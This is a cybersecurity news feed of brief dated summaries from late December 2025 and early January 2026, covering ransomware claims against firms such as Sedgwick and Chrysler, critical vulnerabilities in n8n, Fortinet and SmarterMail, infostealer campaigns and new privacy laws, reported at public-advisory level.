Global claims management leader Sedgwick has reportedly been targeted by the TridentLocker ransomware group. The attack follows the increasingly common 'breach-then-encrypt' model, where threat actors first exfiltrate sensitive data before deploying ransomware to encrypt systems. TridentLocker claims to have stolen data from systems supporting Sedgwick's government services operations, a move designed to maximize pressure for a ransom payment. This incident underscores the evolution of ransomware from a simple availability attack to a complex data breach and extortion scheme. For service providers like Sedgwick, which manage vast amounts of third-party regulated data, such an attack poses significant operational, financial, and reputational risks.

Jan 8, 20264 min read

No MFA, No Problem: "Zestix" Actor Breaches 50 Firms Using Stolen Credentials

A threat actor identified as 'Zestix' (or 'Sentap') has successfully compromised approximately 50 global enterprises by simply logging into their corporate file-sharing portals with valid credentials. According to research from Hudson Rock, the attacks were not sophisticated zero-day exploits but a direct result of a fundamental security failure: the absence of multi-factor authentication (MFA). The actor acquired credentials harvested by infostealer malware like RedLine and Lumma from infected employee devices. They then used these credentials to access sensitive data stored on platforms such as Progress ShareFile, Nextcloud, and OwnCloud. High-profile victims include Iberia Airlines and Sekisui House, highlighting a 'global epidemic of cloud exposure' and the critical, non-negotiable need for MFA across all enterprise applications.

Jan 7, 20264 min read

Ni8mare: Critical Unauthenticated RCE Flaw (CVSS 10.0) Hits n8n Automation Platform

A critical, unauthenticated remote code execution (RCE) vulnerability, codenamed 'Ni8mare' and tracked as CVE-2026-21858, has been disclosed in the popular n8n workflow automation platform. The flaw, which carries the maximum possible CVSS score of 10.0, allows a remote attacker to gain complete control over a vulnerable, self-hosted n8n instance without any credentials. Discovered by Cyera Research Labs, the vulnerability stems from a Content-Type confusion issue where a file-handling function can be improperly invoked. A successful exploit could lead to the theft of sensitive credentials stored in workflows, full server compromise, and lateral movement into connected corporate systems. All self-hosted n8n versions prior to 1.121.0 are affected, and administrators are urged to patch immediately as proof-of-concept details are now public.

Jan 7, 20264 min read

Second CVSS 10.0 RCE Hits n8n, Allows Authenticated Takeover

A second maximum-severity vulnerability, CVE-2026-21877, has been disclosed in the n8n workflow automation platform, also rated CVSS 10.0. Unlike the recently revealed unauthenticated flaw, this vulnerability requires an attacker to be an authenticated user. A low-privileged user can exploit the flaw to achieve remote code execution (RCE), leading to a full takeover of the n8n instance. This could allow an attacker to steal credentials, disrupt workflows, and pivot into connected internal systems. The vulnerability affects both self-hosted and cloud versions of n8n. A patch was released in version 1.121.3 in November 2025, but organizations running older versions remain at high risk. This string of critical flaws puts immense pressure on n8n administrators to patch and secure their instances.

Jan 7, 20264 min read

NIST Releases Draft Cybersecurity Framework Profile for AI

The U.S. National Institute of Standards and Technology (NIST) has released a preliminary draft of a Cybersecurity Framework (CSF) Profile for Artificial Intelligence. This new guidance, intended to be used with CSF 2.0 and the AI Risk Management Framework (AI RMF), aims to help organizations manage the unique cybersecurity risks associated with developing, deploying, and using AI. The draft profile is structured around three focus areas: 'Secure,' 'Defend/Thwart,' and 'Respond,' providing guidance on topics like AI agent identity, preventing arbitrary code execution by AI, and responding to AI-related security incidents. NIST is seeking public comment on the draft until January 30, 2026.

Jan 7, 20263 min read

ownCloud Urges Users to Enable MFA as Credential Stuffing Attacks Surge

In a proactive security move, the developers of the ownCloud file-sharing platform have issued a warning to all users, strongly advising them to enable multi-factor authentication (MFA). The advisory, released on January 7, 2026, is a direct response to recent reports of the 'Zestix' threat actor successfully breaching dozens of organizations by using credentials stolen by infostealer malware on cloud portals without MFA. While ownCloud was not named as a victim in that specific campaign, it is a known target for such attacks. The company is emphasizing that strong passwords alone are insufficient and that MFA is an indispensable layer of defense against credential stuffing and password reuse attacks.

Jan 7, 20263 min read

Qualcomm Issues January Security Bulletin Addressing Multiple Vulnerabilities

Qualcomm has published its January 2026 security bulletin, addressing multiple vulnerabilities of varying severities across a wide range of its products. The bulletin was highlighted by an advisory from the Canadian Centre for Cyber Security on January 7, 2026. Given the ubiquitous nature of Qualcomm chipsets in mobile phones, IoT devices, and automotive systems, these vulnerabilities could have a widespread impact. The specific CVEs and affected products are detailed in the bulletin itself. Users and administrators are urged to review the bulletin and apply necessary firmware or software updates from their device manufacturers as they become available to mitigate potential risks.

Jan 7, 20263 min read

Lapsus$ Hacking Group Is Back with Evolved Extortion Tactics

The notorious Lapsus$ extortion group, known for its high-profile breaches of major tech companies, has reportedly resurfaced. According to a threat intelligence report from January 7, 2026, remnants of the group have reformed and evolved, integrating tactics from other cybercriminal operations. The new iteration of Lapsus$ is said to be shifting its focus towards more nuanced identity-based extortion schemes, moving beyond simple data theft. This evolution suggests a more complex and harder-to-detect threat, leveraging compromised identities for persistent and subtle attacks. Security teams are warned to be on high alert for sophisticated social engineering and extortion attempts targeting employee identities.

Jan 7, 20264 min read

CISA Adds Two New Actively Exploited Vulnerabilities to KEV Catalog

On January 7, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The specific details of the flaws have not been disclosed, but their inclusion confirms they are under active exploitation by malicious actors. In accordance with Binding Operational Directive (BOD) 22-01, Federal Civilian Executive Branch (FCEB) agencies are now required to identify and remediate these vulnerabilities by a specified deadline. CISA strongly urges all public and private sector organizations to review the KEV catalog and prioritize patching these vulnerabilities to defend against active threats.

Jan 7, 20263 min read

Kimwolf Botnet Hijacks 2M Android Devices via Proxy Networks

The Kimwolf botnet has rapidly expanded to infect over 2 million devices worldwide, primarily targeting low-cost Android-based TV and streaming boxes. Active since at least mid-2025, the botnet operators monetize their network by launching large-scale DDoS attacks, surreptitiously installing applications, and selling residential proxy bandwidth. The botnet's growth is fueled by its exploitation of residential proxy networks to infect devices behind home routers, with some evidence suggesting devices are being sold pre-infected.

Jan 6, 20265 min read

Russia-Aligned UAC-0184 Uses Viber to Target Ukrainian Military

The Russia-aligned threat group UAC-0184 (also tracked as Hive0156) has evolved its tactics to include the Viber messaging platform for malware distribution. The group is targeting Ukrainian military and government departments with malicious ZIP archives containing LNK files. When opened, these files deploy the Remcos Remote Administration Tool (RAT), enabling the attackers to conduct espionage. This new vector supplements their previous methods of using phishing emails and other messaging apps like Signal and Telegram.

Jan 6, 20266 min read

New Privacy & Cybersecurity Laws Take Effect Across US States

January 1, 2026, marked the effective date for a significant wave of new state-level privacy and cybersecurity laws in the United States. Comprehensive privacy laws are now active in Indiana, Kentucky, and Rhode Island. Concurrently, new regulations under the California Consumer Privacy Act (CCPA) covering cybersecurity audits, risk assessments, and automated decision-making technology (ADMT) have also come into force, increasing compliance obligations for businesses operating in these states.

Jan 6, 20265 min read

EmEditor Website Hacked to Distribute Infostealer Malware

Emurasoft, the developer of the popular EmEditor text editor, has disclosed that its official website was compromised for a four-day period. During the breach, the main download button on the homepage was redirected to a malicious server hosting a trojanized installer. Users who downloaded and ran this fake installer were infected with an infostealer malware designed to harvest system credentials. The malware also installed a rogue browser extension capable of remote control and cryptocurrency swapping.

Jan 6, 20266 min read

Korean Air Subsidiary Breach Exposes Data of 30,000 Employees

South Korean airline Korean Air has confirmed a significant data breach affecting approximately 30,000 current and former employees. The incident occurred not on the airline's network, but at a former subsidiary and key catering supplier, Korean Air Catering & Duty-Free (KC&D). Attackers infiltrated the supplier's systems and exfiltrated sensitive employee data, including full names and bank account numbers. This supply chain attack highlights the persistent risk posed by third-party vendors, as no customer data was impacted, and the breach was confined to employee information stored on the supplier's compromised network.

Jan 6, 20265 min read

TridentLocker Ransomware Hits Sedgwick's Federal Contracting Arm

Claims administration giant Sedgwick confirmed on January 4, 2026, that its government-focused subsidiary, Sedgwick Government Solutions (SGS), was breached by the emerging TridentLocker ransomware group. The attackers employed a double-extortion strategy, exfiltrating 3.4 GB of data from an isolated file transfer system and threatening its public release. SGS is a major federal contractor for U.S. agencies like the Department of Homeland Security and CISA, making this a significant supply chain security incident.

Jan 5, 20266 min read

Flaws in Airoha Bluetooth Chips Expose Headphones from Sony, Bose to Hijacking

A set of critical vulnerabilities has been disclosed in Bluetooth System-on-Chips (SoCs) from Airoha, a major supplier for popular headphone brands including Sony, Bose, and JBL. The flaws, tracked up to CVE-2025-20702, exist in an unauthenticated diagnostic protocol called RACE. An attacker within Bluetooth range can exploit these flaws to connect to a device without pairing, read or write to memory, access the microphone for eavesdropping, and steal Bluetooth link keys to impersonate the device. The vulnerabilities pose a significant privacy and security risk to millions of consumer electronics users.

Jan 5, 20266 min read

Ransomware Goes Global, Targeting New Regions and Industries with Weaker Defenses

Ransomware is becoming a more globalized and unpredictable threat, according to the H2 2025 Global Threat Briefing from cyber analytics firm CyberCube. The report warns that ransomware groups are actively expanding into new geographic regions and industry sectors that have historically seen fewer attacks, often targeting those with less mature cyber defenses. The highly active LockBit ransomware-as-a-service (RaaS) group is a key driver of this trend. The findings suggest that traditional risk models based on geography or industry are becoming less reliable predictors of attack likelihood.

Jan 4, 20265 min read

Taiwan Reports 2.6 Million Daily Cyberattacks from China in 2025

Taiwan's National Security Bureau (NSB) released a report on January 4, 2026, detailing a massive and sustained cyber offensive by Chinese state-backed actors throughout 2025. The island faced an average of 2.63 million cyberattacks daily, a 6% increase from 2024 and double the rate of 2023. The attacks are described as a core component of Beijing's hybrid warfare strategy, targeting nine critical sectors including energy, healthcare, and government agencies. The NSB identified prominent threat groups like BlackTech, Flax Typhoon, and APT41 behind the campaigns, which utilized vulnerability exploitation, DDoS attacks, and supply chain intrusions. The energy sector saw an alarming 1,000% increase in attacks, underscoring a strategic effort to probe and potentially disrupt Taiwan's essential services.

Jan 4, 20265 min read

Petlibro Smart Feeder API Flaw Lets Anyone Control Devices, Access Cameras

A serious improper access control vulnerability, CVE-2025-3653, has been found in the backend API for Petlibro's smart pet feeders. The flaw allows a remote attacker to take full control of any Petlibro device simply by sending its serial number to the API, with no authentication required. A successful attacker can alter feeding schedules, dispense food on command, and, on camera-equipped models, view the live video feed. Disclosed by VulnCheck, the vulnerability affects Petlibro Smart Pet Feeder Platform versions up to 1.7.31 and highlights the persistent failure of some IoT manufacturers to implement basic security controls, creating significant privacy and safety risks for consumers.

Jan 4, 20264 min read

Critical Flaw in GNU Wget2 Allows Arbitrary File Overwrites

A critical vulnerability, CVE-2025-69194, has been discovered in GNU Wget2, the modern replacement for the ubiquitous Wget file download utility. The flaw is an improper path validation issue (path traversal) that can be triggered by a malicious remote server. An attacker can trick a vulnerable Wget2 client into writing a downloaded file to an arbitrary location on the filesystem. This could be exploited to overwrite critical system files, user configuration files (like .bashrc), or place malicious scripts in sensitive locations, potentially leading to data loss, denial of service, or remote code execution.

Jan 4, 20264 min read

A Look Inside the CVE Process: The Story of a Rejected ID

On January 3, 2026, the National Vulnerability Database (NVD) officially updated the status of CVE-2025-34775 to 'REJECTED'. This status indicates that while the identifier was reserved by a CVE Numbering Authority (CNA), it was ultimately not used for a public vulnerability disclosure. This can occur for several reasons, such as the finding being a duplicate of an existing CVE, the issue not meeting the criteria for a vulnerability, or the researcher withdrawing the submission. While rejected CVEs contain no technical details, their existence provides transparency into the administrative backend of the global vulnerability tracking system.

Jan 4, 20262 min read

Critical RCE in Xspeeder SXZOS Allows Unauthenticated Root Access

A critical remote code execution (RCE) vulnerability, CVE-2025-54322, has been discovered in Xspeeder SXZOS networking appliances. The flaw allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges. The vulnerability exists in the '/vLogin' API endpoint, which improperly processes base64-encoded Python payloads, leading to complete device compromise. Administrators are urged to patch immediately due to the ease of exploitation and the severity of the flaw.

Jan 4, 20265 min read

Clop Ransomware Hits Korean Air in Supply Chain Attack, Exploiting Oracle Zero-Day

Korean Air announced on December 29, 2025, that it suffered a data breach affecting the personal information of approximately 30,000 employees. The breach was the result of a supply chain attack targeting KC&D Service, a former subsidiary. The incident is believed to be the work of the prolific Clop ransomware group (also known as TA505 or FIN11), which exploited a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. This remote code execution flaw, with a CVSS score of 9.8, is part of a wider Clop campaign targeting the aviation industry's supply chain.

Jan 3, 20265 min read

Handala Group Doxes Israeli Intel Agents in Psyops Campaign

The Iran-linked hacktivist group Handala has intensified its information warfare against Israel by publicly exposing the identities of 15 alleged Signal Intelligence (SIGINT) officers on January 3, 2026. This act of doxing is the latest in a series of campaigns designed to inflict psychological and reputational damage on Israeli intelligence and government officials. Investigations by cybersecurity firm KELA suggest Handala's primary attack vector is not sophisticated device hacking but rather the compromise of messaging applications like Telegram, likely through social engineering or session hijacking. The group, believed to be associated with Iran's Ministry of Intelligence and the 'Banished Kitten' cyber unit, frames these leaks as strategic blows, having previously targeted high-profile figures and released documents related to Israel's Iron Dome system and Unit 8200.

Jan 3, 20265 min read

Tokyo FM Radio Hit by Massive Data Breach, 3 Million Records for Sale

A threat actor using the alias 'victim' has claimed responsibility for a major data breach against Tokyo FM Broadcasting Co., LTD., one of Japan's largest radio stations. On January 1, 2026, the attacker announced on a hacker forum that they had stolen a database containing over 3 million records. The compromised data allegedly includes a vast amount of personally identifiable information (PII) from listeners, such as names, addresses, and birth dates, as well as sensitive internal data like employee login credentials. The attacker stated they attempted to disclose the vulnerability to the company but received no response, prompting them to sell the data. If confirmed, this breach would represent a significant violation of Japan's Act on the Protection of Personal Information (APPI), exposing Tokyo FM to severe regulatory penalties and reputational damage.

Jan 3, 20265 min read

KIOTI Tractor Discloses Wider Impact from 2024 Data Breach

Daedong-USA, Inc., parent company of the KIOTI® Tractor Division, issued a notice on January 2, 2026, expanding the scope of a data breach that originally occurred in October 2024. A prolonged investigation that concluded in late 2025 revealed that a wider range of highly sensitive personal information was stolen by an unauthorized party than first realized. The compromised data affects a number of current and former employees, their dependents, and some customers. The stolen information includes names, Social Security numbers, driver's licenses, passport numbers, financial account details, and private health information. The company has begun notifying the newly identified victims and has set up a call center to address concerns, emphasizing that this is an update to a past incident, not a new breach.

Jan 3, 20265 min read

Resecurity Turns Tables on Hackers, Claims Breach Was a Honeypot

Cybersecurity firm Resecurity has publicly refuted claims of a major data breach made by a hacking group known as 'Scattered Lapsus$ Hunters' (SLH). On January 3, 2026, the group announced on Telegram that it had compromised Resecurity's systems, stealing internal data and client information. Resecurity swiftly responded, asserting that the attackers had not breached any production systems but were instead contained within a sophisticated honeypot environment. The firm stated that the screenshots posted by SLH as 'proof' were from this decoy system, which was filled with synthetic data. Resecurity claims the successful deception allowed them to gather valuable threat intelligence on the attackers' TTPs, effectively turning a potential attack into an intelligence-gathering operation.

Jan 3, 20265 min read

Finland Arrests Two in Probe of Damaged Undersea Telecom Cable

Finnish authorities have arrested two crew members of the cargo ship 'Fitburg' in connection with significant damage to an undersea telecommunications cable in the Gulf of Finland. The incident, which occurred around New Year's Eve, disrupted a critical data link owned by Elisa that connects Finland and Estonia. Investigators reported the ship was observed dragging its anchor at the exact time and location of the cable break. The investigation is being treated as potential sabotage and interference with telecommunications, heightening concerns about hybrid threats to critical infrastructure in the strategically sensitive Baltic Sea region. The incident follows a pattern of disruptions to undersea infrastructure since the start of the war in Ukraine.

Jan 3, 20265 min read

VVS Stealer Malware Uses PyArmor Obfuscation to Target Discord Users

A new information-stealing malware named VVS Stealer is being sold on Telegram and used to target Discord users. Written in Python, the stealer's key feature is its use of the legitimate tool PyArmor to heavily obfuscate its code, allowing it to bypass static analysis and signature-based antivirus detection. Once on a victim's system, VVS Stealer establishes persistence and proceeds to steal a wide range of data. It specifically targets Discord, using the Windows DPAPI to decrypt authentication tokens and malicious JavaScript injection to capture password changes in real-time. The malware also exfiltrates cookies, history, and saved passwords from nearly 20 different web browsers, sending the stolen data to an attacker-controlled Discord webhook.

Jan 3, 20265 min read

Infostealers Fuel Vicious Cycle, Hijacking Victim Websites to Spread More Malware

A new report from Hudson Rock highlights a dangerous and self-perpetuating cybercrime trend where credentials stolen by infostealer malware are used to hijack legitimate business websites. Attackers gain administrative access to platforms like WordPress using the stolen logins, then inject malicious scripts to turn the trusted sites into malware distribution points. These compromised sites are then used in campaigns employing social engineering tactics like 'ClickFix,' which tricks visitors into executing malicious PowerShell commands. This creates a vicious feedback loop: infostealers harvest credentials, which are used to compromise websites, which then distribute more infostealers like Lumma and Vidar, amplifying the scale and effectiveness of their campaigns.

Jan 3, 20265 min read

Over 10,000 Fortinet Firewalls Exposed to Critical 2FA Bypass Flaw

Security watchdog Shadowserver revealed on January 2, 2026, that over 10,000 Fortinet FortiGate firewalls remain unpatched and vulnerable to a critical, five-year-old 2FA bypass flaw, CVE-2020-12812. This vulnerability, rated 9.8 on the CVSS scale, allows an attacker with valid credentials to bypass FortiToken-based two-factor authentication by simply changing the case of the username during login. The flaw stems from a mismatch where FortiGate is case-sensitive, but the backend LDAP server is not. Despite patches being available since July 2020 and CISA adding it to its Known Exploited Vulnerabilities (KEV) catalog, thousands of devices, including over 1,300 in the US, remain exposed and are being actively exploited by threat actors.

Jan 3, 20265 min read

Critical Auth Bypass Flaw (CVSS 9.8) in IBM API Connect

IBM has issued an urgent security advisory for a critical authentication bypass vulnerability, CVE-2025-13915, in its API Connect platform. The flaw carries a CVSS score of 9.8, reflecting its potential for severe impact. It could allow a remote, unauthenticated attacker to bypass security controls and gain unauthorized access to applications managed by the platform. The vulnerability affects specific versions of API Connect V10. IBM has released patches and strongly urges customers to apply them immediately. As a temporary mitigation, disabling the self-service sign-up feature on the Developer Portal is recommended. There is currently no evidence of active exploitation.

Jan 2, 20265 min read

Apple Supply Chain on Alert After Cyberattack Hits Key Chinese Manufacturer

Apple's supply chain is on high alert following a cyberattack in mid-December 2025 against one of its major Chinese manufacturing partners. The breach has raised significant concerns about the potential exposure of sensitive intellectual property, including production-line data and proprietary trade secrets related to Apple products. While the unnamed supplier claims the issue is resolved, internal audits are ongoing to assess the extent of the data loss. The incident highlights the persistent risk to major technology firms from attacks targeting their less secure supply chain partners.

Jan 2, 20265 min read

Year-End Report: Ransomware Industrializes into Cartels, Edge Devices Become Top Target

A year-end analysis of the 2025 threat landscape highlights two dominant and transformative trends for enterprises. First, Ransomware-as-a-Service (RaaS) has 'industrialized,' with threat groups operating like sophisticated cartels and employing 'Extortion 2.0' tactics that involve both data encryption and theft. Second, network edge devices such as VPNs, firewalls, and routers have become the primary target for state-sponsored actors seeking initial access. Experts recommend 'industrial defenses,' including immutable backups and aggressive patch management, and a strategic shift towards Secure Access Service Edge (SASE) architecture to counter these evolving threats.

Jan 1, 20265 min read

Report: AI-Powered Social Engineering and Identity Attacks Dominated 2025

The 2025 Threat-Led Defense Report from Tidal Cyber reveals a significant shift in the threat landscape, where attackers are adapting faster than security defenses. Key trends from 2025 include the widespread adoption of AI to automate and scale highly convincing social engineering campaigns, and a strategic pivot towards identity-driven attacks. Adversaries are increasingly targeting SaaS platforms, cloud administration accounts, and single sign-on (SSO) services to gain broad access without deploying traditional malware. The report also notes that zero-day exploits are now being leveraged by a wider range of criminal and hybrid actors, not just elite state-sponsored groups.

Jan 1, 20266 min read

Hackers Use Animated Lures and Fake Legal Warnings to Spread Malware

HP's latest Threat Insights Report reveals a significant evolution in social engineering tactics, with cybercriminals using highly convincing lures such as professional animations and fake legal warnings to trick users into downloading malware. The report highlights a campaign impersonating the Colombian Prosecutor's Office to deliver PureRAT. It also details the abuse of trusted platforms like Discord for hosting malicious payloads like the Phantom Stealer and notes the rising threat of session cookie hijacking.

Dec 31, 20254 min read

European Space Agency Probes Breach; Hacker Claims 200GB of Data for Sale

The European Space Agency (ESA) is investigating a security incident after a threat actor, using the alias "888," claimed to have breached its systems and stolen 200GB of data. The agency confirmed the breach was limited to external servers used for unclassified collaborative engineering work and that its primary corporate network remains secure. The hacker is attempting to sell the stolen data, which reportedly includes source code, project documentation, and API keys, on a cybercrime forum, raising concerns about potential intelligence gathering and future supply chain attacks.

Dec 31, 20256 min read

Petco Data Breach Exposes Customer SSNs and Financial Info Due to Misconfiguration

Pet product retailer Petco has disclosed a data breach caused by a software misconfiguration that left highly sensitive customer files accessible on the internet. The exposed data includes full names, Social Security numbers, driver's license numbers, and financial account details, including credit and debit card numbers. The company discovered the issue internally and has since corrected the misconfiguration. Filings with state attorneys general indicate at least 500 California residents are affected, with an unknown number of victims in other states.

Dec 31, 20255 min read

Malicious Trust Wallet Chrome Extension Pushed via Leaked API Key, $7M Stolen

Trust Wallet confirmed on December 26, 2025, that a malicious version of its Chrome browser extension (v2.68) was published, leading to the theft of approximately $7 million in cryptocurrency from 2,596 wallet addresses. The attackers bypassed internal security checks by using a leaked Chrome Web Store API key to publish the compromised version directly. The malicious code was hidden within the application's analytics logic, using the PostHog library to exfiltrate user data to an attacker-controlled server. Over $4 million of the stolen funds have already been laundered through centralized exchanges. Trust Wallet has suspended the malicious domain and is processing reimbursements for affected users.

Dec 31, 20255 min read

2025: The Year Cybersecurity 'Crossed the AI Rubicon'

According to analysis published on December 14, 2025, the year 2025 represents a fundamental and irreversible turning point for the cybersecurity industry. The widespread integration of Artificial Intelligence (AI) into both offensive and defensive strategies has permanently altered the threat landscape. Key trends include the rise of 'agentic AI' capable of autonomous attacks, adaptive threats that change tactics in real-time, and a surge in highly convincing, AI-generated phishing and deepfake content. While defenders are also adopting AI, the 'great acceleration' in threat complexity is forcing a complete rethink of security playbooks.

Dec 30, 20254 min read

Maximum Severity RCE Flaw in SmarterMail Puts Mail Servers at Risk

A critical, unauthenticated arbitrary file upload vulnerability in SmarterMail, tracked as CVE-2025-52691, has been disclosed, earning the maximum possible CVSS score of 10.0. The flaw allows a remote attacker to upload malicious files, such as a web shell, to any location on an affected server without needing credentials. This can lead to remote code execution (RCE), enabling a complete takeover of the mail server. The vulnerability affects SmarterMail builds 9406 and earlier. Although a patch was released in October 2025 (Build 9413), the public disclosure was delayed until late December. The Cyber Security Agency of Singapore (CSA) has issued an alert, urging administrators to update immediately due to the high risk of exploitation, especially for internet-facing mail servers.

Dec 30, 20255 min read

Insider Threat: Cybersecurity Pros Plead Guilty to ALPHV/BlackCat Ransomware Attacks

In a significant insider threat case, two American cybersecurity professionals, Ryan Goldberg and Kevin Martin, have pleaded guilty to conspiracy to commit extortion. The pair admitted to using their expert knowledge and access gained from their roles in incident response and ransomware negotiation to conduct ransomware attacks against U.S. companies using the ALPHV/BlackCat ransomware variant. Operating as affiliates for the Ransomware-as-a-Service (RaaS) group, they targeted organizations in the healthcare, engineering, and technology sectors, extorting $1.2 million in one case. The Department of Justice announced the pleas on December 30, 2025, highlighting the danger of trusted insiders turning to cybercrime. Both individuals face up to 20 years in prison.

Dec 30, 20255 min read

Rainbow Six Siege Hacked: Attackers Flood Game with $13M in Currency, Disrupting Economy

Over the weekend of December 27-28, 2025, Ubisoft's popular online shooter, Rainbow Six Siege, was hit by a major security breach. Attackers infiltrated the game's backend systems, distributing approximately 2 billion 'R6 Credits'—the game's premium currency, valued at over $13 million—to every player. The hackers also took control of moderation systems, issuing random bans and unbans, causing widespread chaos. In response, Ubisoft was forced to take the game completely offline to perform a full data rollback. While unconfirmed, some hacker groups have claimed responsibility, alleging they used the recently disclosed 'MongoBleed' exploit to gain access and may have stolen over 900GB of development data.

Dec 30, 20256 min read

Fallout from 2022 LastPass Breach Continues: Over $35M in Crypto Stolen

The 2022 data breach at password manager LastPass is continuing to enable widespread financial theft, with researchers tracing over $35 million in stolen cryptocurrency to the incident. A report by blockchain intelligence firm TRM Labs reveals that threat actors are systematically cracking the encrypted password vaults stolen in the breach, with thefts observed as recently as October 2025. By brute-forcing weak master passwords, attackers gain access to stored crypto private keys and seed phrases. The stolen funds are being laundered through a sophisticated network involving privacy mixers and high-risk Russian exchanges, pointing to an organized cybercriminal operation. This long-tail exploitation highlights the severe and prolonged risks associated with password manager breaches.

Dec 30, 20256 min read

Hacker Leaks 2.3M WIRED Subscriber Records, Threatens 40M More from Condé Nast

A threat actor named 'Lovely' has leaked a database containing over 2.3 million records of WIRED magazine subscribers on a hacking forum. The leaked data includes email addresses, internal IDs, and in some cases, full names, phone numbers, and physical addresses. The hacker claims the leak is retaliation against WIRED's parent company, Condé Nast, for ignoring vulnerability disclosure reports for a month. 'Lovely' has threatened to release a much larger dataset of 40 million records from other Condé Nast brands like The New Yorker and Vogue. The data, which has been added to Have I Been Pwned, appears to have been exfiltrated by exploiting web application vulnerabilities such as IDOR or broken access control.

Dec 30, 20255 min read

Cl0p Implicated in Oracle Zero-Day Attacks, Breaching UPenn and University of Phoenix

The University of Pennsylvania and the University of Phoenix have both reported data breaches resulting from the exploitation of zero-day vulnerabilities in their Oracle E-Business Suite servers. The attacks have compromised the personal information of at least 1,488 individuals at UPenn and a much larger, unspecified number of students, alumni, and staff at the University of Phoenix. Security researchers suspect the notorious Cl0p ransomware gang is behind the campaign, continuing their pattern of exploiting vulnerabilities in widely used enterprise software for large-scale data theft and extortion. Both institutions are currently notifying affected individuals.

Dec 29, 20255 min read

Hyperjacking: Ransomware Attacks on Hypervisors Skyrocket by 700%

Security vendor Huntress reports a staggering 700% increase in ransomware attacks directly targeting virtualization hypervisors like VMware ESXi and Microsoft Hyper-V in the latter half of 2025. This marks a significant strategic shift by threat actors, with the Akira ransomware group being a primary driver. By compromising the hypervisor, attackers can bypass traditional endpoint security and encrypt dozens or hundreds of virtual machines simultaneously, causing catastrophic operational disruption. The typical attack vector involves exploiting weak or stolen credentials for internet-facing services, such as VPNs without MFA, to gain initial access before moving laterally to the virtualization infrastructure. This trend underscores the critical need for organizations to harden and secure their core virtualization platforms.

Dec 29, 20256 min read

900,000+ Users Compromised: Malicious Chrome Extensions Steal ChatGPT & DeepSeek Conversations

A significant data theft campaign has been uncovered involving two malicious Google Chrome extensions that were installed by over 900,000 users. The extensions, which impersonated legitimate AI productivity tools, were designed to secretly capture and exfiltrate entire conversation histories from AI platforms like ChatGPT and DeepSeek. In addition to stealing potentially sensitive AI chat data, the malware also monitored all user browsing activity, sending the harvested information to an attacker-controlled command-and-control server at `deepaichats[.]com`. One of the extensions had even received a 'Featured' badge from Google, highlighting the challenge of policing browser extension marketplaces.

Dec 29, 20254 min read

DevMan Ransomware Group Claims Attack on U.S. Financial Firm Sharinc Inc.

The DevMan ransomware group has claimed responsibility for a cyberattack against Sharinc Inc., a U.S.-based financial organization. The claim was made on December 28, 2025, on the group's data leak site. The attackers have threatened to publish sensitive financial and customer data if their extortion demands are not met. This incident underscores the persistent and targeted threat that ransomware gangs pose to the financial services industry, which remains a high-value target due to the sensitive nature of the data it handles.

Dec 29, 20255 min read

Software Supply Chain Attacks Doubled in 2025, Report Finds

A year-end security analysis published on December 29, 2025, reveals that software supply chain attacks more than doubled globally in 2025, with associated losses projected to reach $60 billion. The report, from CleanStart, indicates that this has become a systemic risk, with over 70% of organizations experiencing a related security incident. Despite the surge, the report finds that enterprise readiness to combat these threats remains critically low, with most organizations unable to quickly identify compromised components within their software.

Dec 29, 20254 min read

Microsoft and Adobe Release December Patches for Over 190 Vulnerabilities

In their final security updates for 2025, Microsoft and Adobe addressed a combined total of over 190 vulnerabilities on December 28. Microsoft's Patch Tuesday release fixed 56 flaws, including a critical zero-day privilege escalation vulnerability (CVE-2025-62221) in the Windows Cloud Files Mini Filter Driver that is being actively exploited. Adobe's release was even more extensive, remediating 139 CVEs across a range of products, including Adobe Reader and Experience Manager. Administrators are urged to apply these critical updates promptly to mitigate risks.

Dec 29, 20254 min read

Critical XSS Flaw in WordPress Plugin 'Invelity SPS connect' Disclosed

A reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-68876, was disclosed on December 28, 2025, affecting the 'Invelity SPS connect' WordPress plugin. The flaw, which has a CVSS score of 7.1, can be exploited by unauthenticated attackers and impacts all versions up to and including 1.0.8. At the time of disclosure, no patch was available. An attacker could trick a user into clicking a malicious link to execute arbitrary JavaScript in their browser, potentially leading to session hijacking. Administrators are advised to disable the plugin immediately.

Dec 29, 20254 min read

Qilin Ransomware Gang Adds Business Services Firm B Dynamic to Leak Site

The Qilin ransomware group, a prominent ransomware-as-a-service (RaaS) operation, has listed business services company 'B Dynamic' as its latest victim on its dark web data leak site. The December 1, 2025, posting indicates that the company has suffered a network compromise and data exfiltration. By publicizing the breach, the Qilin group is employing its standard double-extortion tactic to pressure the victim into paying a ransom to prevent the public release of stolen data. This incident highlights the persistent threat from established ransomware gangs.

Dec 28, 20255 min read

Clop Ransomware Breaches Barts Health NHS Trust via Oracle Zero-Day

The Clop ransomware gang has claimed responsibility for a significant data breach at Barts Health NHS Trust, one of England's largest healthcare providers. The attack, which occurred in August 2025, leveraged a zero-day vulnerability in Oracle E-Business Suite. The threat actors exfiltrated files from an invoice database containing the names and addresses of patients and former staff. This data was later published on Clop's dark web leak site. While core clinical systems were reportedly unaffected, the compromised information poses a serious risk for follow-on social engineering and fraud attacks. The incident is part of a wider campaign by Clop targeting the now-patched Oracle vulnerability.

Dec 28, 20254 min read

Everest Ransomware Claims Breach of Chrysler, Threatens to Leak Over 1TB of Data

The Everest ransomware group has claimed responsibility for a significant data breach at the American automaker Chrysler. In a post on its dark web leak site on December 25, 2025, the group alleged it exfiltrated over 1 terabyte (TB) of data, including a "full database" of company operations and over 100 GB of Salesforce data covering 2021 to 2025. Chrysler has not yet confirmed the breach, but the claim represents a serious threat of data exposure for the major automotive manufacturer, following a common double-extortion tactic.

Dec 28, 20255 min read

Living Off the Cloud: Phishing Campaign Abuses Google Cloud Service to Bypass Security Filters

A widespread and sophisticated phishing campaign is abusing Google Cloud's own Application Integration service to send malicious emails that appear to come from a legitimate Google address ("noreply-application-integration@google.com"). This technique allows the emails to bypass standard security filters like SPF and DMARC. The campaign, which sent nearly 9,400 emails in two weeks, impersonates routine notifications to trick users into clicking links that lead to credential harvesting pages, demonstrating how attackers are increasingly weaponizing trusted cloud platforms.

Dec 28, 20255 min read

Iran's "Prince of Persia" APT Returns with Upgraded Malware, Uses Telegram for C2

